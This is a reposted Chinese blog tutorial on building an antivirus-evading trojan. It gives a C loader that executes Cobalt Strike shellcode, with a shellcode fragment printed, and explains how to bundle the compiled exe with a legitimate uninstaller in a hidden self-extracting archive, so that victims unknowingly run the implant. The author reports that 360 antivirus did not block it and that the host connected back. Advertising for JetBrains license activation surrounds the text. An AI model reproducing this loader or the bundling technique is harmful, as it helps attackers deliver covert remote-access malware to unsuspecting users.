exe免杀c语言,CobaltStrike shellcode免杀捆绑exe思路[通俗易懂]

exe免杀c语言,CobaltStrike shellcode免杀捆绑exe思路[通俗易懂]这里演示的方式为shellcode框架加载自解压1.生成shellcode2.c加载(随便拉的加载器)#include#include#pragmacomment(linker,”/subsystem:\”windows\”/entry:\”mainCRTStartup\””)unsignedcharshellcode[]=”\xfc\xe8\x89\x00\x00\x00\x60\…

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE使用 1年只要46元 售后保障 童叟无欺

这里演示的方式为shellcode框架加载自解压

1.生成shellcode

2.c加载(随便拉的加载器)#include

#include

#pragma comment(linker,”/subsystem:\”windows\” /entry:\”mainCRTStartup\””)

unsigned char shellcode[] =

“\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b”

“\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0”

“\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57”;

void main()

{

((void(*)(void))&shellcode)();

}

3.自解压捆绑exe

当目标运行正常exe的同时会运行我们的木马

复现

使用cobaltstrike生成c的shellcode

55d3f772d354d36a658801abf4f14676.png

将生成的shellcode利用我们自己的加载器加载

c485c6afeda934281fb7bb6ad0ea2539.png

使用vc6++打开

编译组建 生成exe

7be92ab3014f1c06586fa1699eba3d57.png

13c29449ed82a99159860e49c3f9b507.png

生成的exe文件位于桌面debug文件目录下

70a93fd415e47e98bba496f131d2562b.png

接下来使用自解压捆绑exe文件

假设这里捆绑的软件为geek(卸载程序的一个软件)选择我们的木马和要捆绑的软件 选择添加到压缩文件

选择创建自解压格式压缩文件

高级 选择自解压选项

解压路径设置为c盘windows下的temp文件

解压后运行设置选择启动我们的exe和捆绑的软件

模式选择全部隐藏

更新选择解压并更新文件和覆盖所有文件

点击确认生成捆绑马

7d60bab74e826142c73bd426dd917dbf.png

3d640a481dfd4674b9732443b3f89f39.png

bc3b4cbd407a5dc161ee5ea932ecb67e.png

1f4fcd9cba49878bee61ee0031d8f104.png

651df41da1f3f1712bc76fec69229412.png

f5d11b7a18c020df417d095c8f54adb2.png

f2027e91c0ebeb77fb6672d9e1da8cca.png

点击确认 生成捆绑马

96866ac439ad26eb1761f3ca5425053e.png

这里环境有360 实验360并未作出拦截

双击运行看是否上线

02a1b07ee570898ab0c1e3be29424620.png

171d82a465e089de91a2649223cb5735.png

软件正常打开 并且主机成功上线

这个加载器的免杀效果一般 大佬们可以自行替换

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/171433.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)
blank

相关推荐

  • 启动了韩剧_startactivity

    启动了韩剧_startactivity一般来说当我们从launcher中启动一个应用进入到ActivityA中,系统会为这个应用生成一个新任务堆栈并置于前台,ActivityA被放入栈底,之后从ActivityA启动另一个ActivityB,如果不设置什么附加属性,ActivityB默认也放到和ActivityA这个堆栈中,这样当你按返回时,B出栈,A呈现出来了,这个应该很好理解。那现在假如ActivityA启动一个Service…

  • linux命令mysql启动,linux下启动mysql的命令

    linux命令mysql启动,linux下启动mysql的命令linux下启动mysql的命令一、总结一下:1.linux下启动mysql的命令:mysqladminstart/ect/init.d/mysqlstart(前面为mysql的安装路径)2.linux下重启mysql的命令:mysqladminrestart/ect/init.d/mysqlrestart(前面为mysql的安装路径)3.linux下关闭mysql的命令:mysqla…

  • 【MongoDB数据库】怎样安装、配置MongoDB

    【MongoDB数据库】怎样安装、配置MongoDB

  • C#之ArcGIS二次开发

    C#之ArcGIS二次开发根据图层名称获取图层publicIFeatureLayergetLayer(AxMapControlaxMapControl,stringlayerName){if(axMapControl.LayerCount>0){for(inti=0;i

  • 联想st510开卡软件_固态硬盘修复(慧荣sm2246XT主控开卡教程)

    联想st510开卡软件_固态硬盘修复(慧荣sm2246XT主控开卡教程)本帖最后由lwj2996868501于2019-3-2513:12编辑此教程仅适用于固态硬盘且主控SM2246XT的,不是这个主控的就没必要看下去了!准备工具:起子,镊子(铁丝也行),坏固态硬盘,sata转USB转接卡(硬盘盒也可以),慧荣sm2246XT开卡工具(此帖子只提供一个版本的工具,其他版本自行网上下载,这个主控开卡工具版本很多具体用什么版本网上找就找得到界面都是一样的。不用一…

  • js拼接字符串练习(一)

    js拼接字符串练习(一)动态生成表格,通过用户输入的背景颜色、边框宽度、表格宽度、对齐方式、行高、内容来动态生成表格:<!DOCTYPEhtml><html> <head> <metacharset="UTF-8"> <title></title> </head> <body&amp

    2022年10月28日

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号